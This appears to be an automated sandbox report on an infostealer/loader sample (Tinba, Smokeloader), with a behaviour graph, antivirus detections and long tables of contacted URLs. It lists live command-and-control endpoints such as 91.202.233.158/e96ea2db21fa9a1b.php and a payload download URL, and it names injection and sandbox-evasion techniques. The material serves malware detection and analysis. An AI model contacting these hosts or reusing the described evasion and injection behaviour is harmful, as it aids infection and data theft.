              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502739 Sample: oZB7n3wuNk.exe Startdate: 02/09/2024 Architecture: WINDOWS Score: 100 42 www.darkviolet-alpaca-923878.hostingersite.com 2->42 44 free.cdn.hstgr.net 2->44 46 2 other IPs or domains 2->46 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 9 other signatures 2->64 9 oZB7n3wuNk.exe 2->9         started        12 birajci 2->12         started        14 explorer.exe 25 127 2->14         started        signatures3 process4 signatures5 74 Detected unpacking (changes PE section rights) 9->74 76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->76 78 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->78 88 3 other signatures 9->88 16 explorer.exe 26 5 9->16 injected 80 Multi AV Scanner detection for dropped file 12->80 82 Machine Learning detection for dropped file 12->82 84 Maps a DLL or memory area into another process 12->84 86 Query firmware table information (likely to detect VMs) 14->86 process6 dnsIp7 38 epohe.ru 2.185.214.11, 49716, 49717, 49718 TCIIR Iran (ISLAMIC Republic Of) 16->38 40 free.cdn.hstgr.net 84.32.84.152, 443, 49744 NTT-LT-ASLT Lithuania 16->40 30 C:\Users\user\AppData\Roaming\birajci, PE32 16->30 dropped 32 C:\Users\user\AppData\Local\Temp\9A25.exe, PE32 16->32 dropped 34 C:\Users\user\...\birajci:Zone.Identifier, ASCII 16->34 dropped 50 System process connects to network (likely due to code injection or exploit) 16->50 52 Benign windows process drops PE files 16->52 54 Deletes itself after installation 16->54 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->56 21 9A25.exe 1 16->21         started        25 WerFault.exe 21 16->25         started        file8 signatures9 process10 file11 36 C:\Users\user\AppData\...\svchost015.exe, PE32 21->36 dropped 66 Multi AV Scanner detection for dropped file 21->66 68 Contains functionality to inject code into remote processes 21->68 70 Writes to foreign memory regions 21->70 72 3 other signatures 21->72 27 svchost015.exe 13 21->27         started        signatures12 process13 dnsIp14 48 91.202.233.158, 49751, 80 M247GB Russian Federation 27->48

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              oZB7n3wuNk.exe63%ReversingLabsWin32.Infostealer.Tinba
              oZB7n3wuNk.exe64%VirustotalBrowse
              oZB7n3wuNk.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\birajci100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\9A25.exe38%ReversingLabsWin32.Trojan.Smokeloader
              C:\Users\user\AppData\Local\Temp\svchost015.exe4%ReversingLabs
              C:\Users\user\AppData\Roaming\birajci63%ReversingLabsWin32.Infostealer.Tinba
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
              https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
              http://ocsps.ssl.com00%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              https://excel.office.com0%URL Reputationsafe
              http://schemas.micro0%URL Reputationsafe
              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
              https://www.ssl.com/repository00%URL Reputationsafe
              http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://word.office.com0%URL Reputationsafe
              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%URL Reputationsafe
              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
              http://91.202.233.158/e96ea2db21fa9a1b.phpF100%Avira URL Cloudmalware
              https://outlook.com0%URL Reputationsafe
              http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
              http://91.202.233.158/e96ea2db21fa9a1b.phpZ100%Avira URL Cloudmalware
              https://api.msn.com/I0%Avira URL Cloudsafe
              https://word.office.comM0%Avira URL Cloudsafe
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
              https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF0%Avira URL Cloudsafe
              http://crls.ssl.com/ssl.com-rsa-RootCA.crl00%URL Reputationsafe
              http://www.x-ways.net/winhex/subscribe-d.htmlU0%Avira URL Cloudsafe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
              https://github.com/tesseract-ocr/tessdata/0%Avira URL Cloudsafe
              http://91.202.233.158/e96ea2db21fa9a1b.phpO100%Avira URL Cloudmalware
              https://android.notify.windows.com/iOS0%URL Reputationsafe
              https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%URL Reputationsafe
              https://api.msn.com/0%URL Reputationsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
              http://www.x-ways.net/order0%Avira URL Cloudsafe
              http://www.x-ways.net/order.html-d.htmlS0%Avira URL Cloudsafe
              http://olihonols.in.net/tmp/0%Avira URL Cloudsafe
              http://91.202.233.158/100%Avira URL Cloudmalware
              http://91.202.233.158/e96ea2db21fa9a1b.php100%Avira URL Cloudmalware
              https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%Avira URL Cloudsafe
              http://91.202.233.158100%Avira URL Cloudmalware
              http://nicetolosv.xyz/tmp/0%Avira URL Cloudsafe
              https://www.x-ways.net/winhex/forum/0%Avira URL Cloudsafe
              http://www.x-ways.net/winhex/license-d-f.htmlS0%Avira URL Cloudsafe
              http://91.202.233.158/e96ea2db21fa9a1b.php6100%Avira URL Cloudmalware
              http://91.202.233.158/e96ea2db21fa9a1b.php4100%Avira URL Cloudmalware
              https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h0%Avira URL Cloudsafe
              http://jftolsa.ws/tmp/0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu0%Avira URL Cloudsafe
              https://www.x-ways.net/forensics/x-tensions.html0%Avira URL Cloudsafe
              http://91.202.233.158/e96ea2db21fa9a1b.phpws100%Avira URL Cloudmalware
              http://www.x-ways.net/winhex/subscribe0%Avira URL Cloudsafe
              https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection0%Avira URL Cloudsafe
              https://www.darkviolet-alpaca-923878.hostingersite.com/Coin.exe0%Avira URL Cloudsafe
              https://www.x-ways.net/forensics/x-tensions.htmlf0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz0%Avira URL Cloudsafe
              https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc0%Avira URL Cloudsafe
              https://excel.office.com-0%Avira URL Cloudsafe
              http://91.202.233.158/ws100%Avira URL Cloudmalware
              https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-0%Avira URL Cloudsafe
              http://91.202.233.158Gk0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA0%Avira URL Cloudsafe
              http://epohe.ru/tmp/0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c0%Avira URL Cloudsafe
              https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve0%Avira URL Cloudsafe
              http://91.202.233.158j0%Avira URL Cloudsafe
              https://outlook.come0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation0%Avira URL Cloudsafe
              https://powerpoint.office.comEMd0%Avira URL Cloudsafe
              https://www.msn.com:443/en-us/feed0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%Avira URL Cloudsafe
              http://91.202.233.158/e96ea2db21fa9a1b.php5d1ef941bc7800100%Avira URL Cloudmalware
              http://www.x-ways.net/winhex/license0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              epohe.ru
              2.185.214.11
              truetrue
                unknown
                free.cdn.hstgr.net
                84.32.84.152
                truetrue
                  unknown
                  www.darkviolet-alpaca-923878.hostingersite.com
                  unknown
                  unknowntrue
                    unknown
                    api.msn.com
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://nicetolosv.xyz/tmp/true
                      • Avira URL Cloud: safe
                      unknown
                      http://olihonols.in.net/tmp/true
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158/true
                      • Avira URL Cloud: malware
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://jftolsa.ws/tmp/true
                      • Avira URL Cloud: safe
                      unknown
                      https://www.darkviolet-alpaca-923878.hostingersite.com/Coin.exetrue
                      • Avira URL Cloud: safe
                      unknown
                      http://epohe.ru/tmp/true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.phpFsvchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.msn.com/Iexplorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.sectigo.com09A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.phpOsvchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://word.office.comMexplorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.phpZsvchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://ocsps.ssl.com09A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://github.com/tesseract-ocr/tessdata/9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.x-ways.net/winhex/subscribe-d.htmlU9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 0000000C.00000002.3367028354.000000000B390000.00000004.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://excel.office.comexplorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.microexplorer.exe, 00000002.00000000.2161155359.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2161168607.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2159653301.00000000028A0000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.x-ways.net/order9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.x-ways.net/order.html-d.htmlS9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.ssl.com/repository09A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      http://91.202.233.158svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.x-ways.net/winhex/forum/9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.x-ways.net/winhex/license-d-f.htmlS9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.php6svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.php4svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl09A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.x-ways.net/forensics/x-tensions.html9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://sectigo.com/CPS09A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://word.office.comexplorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://91.202.233.158/e96ea2db21fa9a1b.phpwssvchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://www.x-ways.net/winhex/subscribe9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.x-ways.net/forensics/x-tensions.htmlf9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://excel.office.com-explorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.233.158/wssvchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://91.202.233.158Gksvchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://outlook.comexplorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
